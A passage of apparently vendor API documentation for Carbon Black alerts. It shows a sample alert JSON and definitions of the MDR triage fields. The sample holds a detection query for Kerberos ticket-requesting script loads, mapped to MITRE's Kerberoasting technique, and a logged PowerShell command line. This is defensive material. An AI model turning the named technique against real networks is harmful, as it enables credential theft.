            "amsi",
            "attack",
            "attackframework"
        ],
        "report_link":"https://attack.mitre.org/techniques/T1558/003/",
        "ioc_id":"b1c1ae83-f66b-4aa3-a496-363e296f4018",
        "ioc_hit":"fileless_scriptload_cmdline:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\" OR scriptload_content:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\"",
        "watchlists":[{
            "id":"Ci7w5B4URg6HN60hatQMQ",
            "name":"AMSI Threat Intelligence"
            }],
        "process_guid":"ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423",
        "process_pid":13636,
        "process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
        "process_sha256":"d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd",
        "process_md5":"0499440c4b0783266183246e384c6657",
        "process_reputation":"TRUSTED_WHITE_LIST",
        "process_effective_reputation":"TRUSTED_WHITE_LIST",
        "process_cmdline":"powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -",
        "process_username":"NT AUTHORITY\\SYSTEM",
        "process_issuer":["Microsoft Windows Production PCA 2011"],
        "process_publisher":["Microsoft Windows"],
        "parent_guid":"ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9",
        "parent_pid":10384,
        "parent_name":"c:\\program files\\unowhy\\hisqool manager\\hisqoolmanager.exe",
        "parent_sha256":"4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282",
        "parent_md5":"c7e583681f0958d4f5d32afd09d8084b",
        "parent_reputation":"NOT_LISTED",
        "parent_effective_reputation":"NOT_LISTED",
        "parent_cmdline":"\"C:\\Program Files\\Unowhy\\HiSqool Manager\\HiSqoolManager.exe\" ",
        "parent_username":"NT AUTHORITY\\SYSTEM",
        "mdr_alert_notes_present":false,
        "mdr_alert":false,
        "ml_classification_final_verdict":"ANOMALOUS",
        "ml_classification_global_prevalence":"MEDIUM",
        "ml_classification_org_prevalence":"LOW"
    }


Managed Detection and Response (MDR) Fields

These fields are included on all alert types for customers who subscribe to the MDR product.

Field Name Definition Datatype
mdr_alert Is the alert eligible for review by Carbon Black MDR Analysts? Boolean
mdr_alert_notes_present Customer visible notes at the alert level that were added by a MDR analyst Boolean
mdr_determination MDR updatable classification of the alert Nested Response Object: 
{
  "mdr_determination": {
    "change_timestamp": "<string>",
    "value": "<string>"
  }
}
mdr_determination_change_timestamp When the last MDR classification change occurred ISO 8601 UTC Date String
mdr_determination_value A record that identifies the whether the alert was determined to represent a likely or unlikely threat. String
NOT_ENOUGH_INFO
NOT_REVIEWED
NONE
UNLIKELY_THREAT
LIKELY_THREAT
mdr_workflow MDR-updatable workflow of the alert Nested Response Object: 
{
    "mdr_workflow": {
      "change_timestamp": "<string>",
      "status": "<string>",
      "is_assigned": "<boolean>"
    }
}
mdr_workflow_change_timestamp When the last MDR status change occurred ISO 8601 UTC Date String
mdr_workflow_is_assigned Boolean
mdr_workflow_status Primary value used to capture status change during MD Analyst’s alert triage String
UNCLAIMED
IN_PROGRESS
TRIAGE_COMPLETE
ACTION_REQUESTED
PENDING_RESPONSE
RESPONCE_RECEIVED

Give Feedback

New survey coming soon!


Last modified on August 3, 2023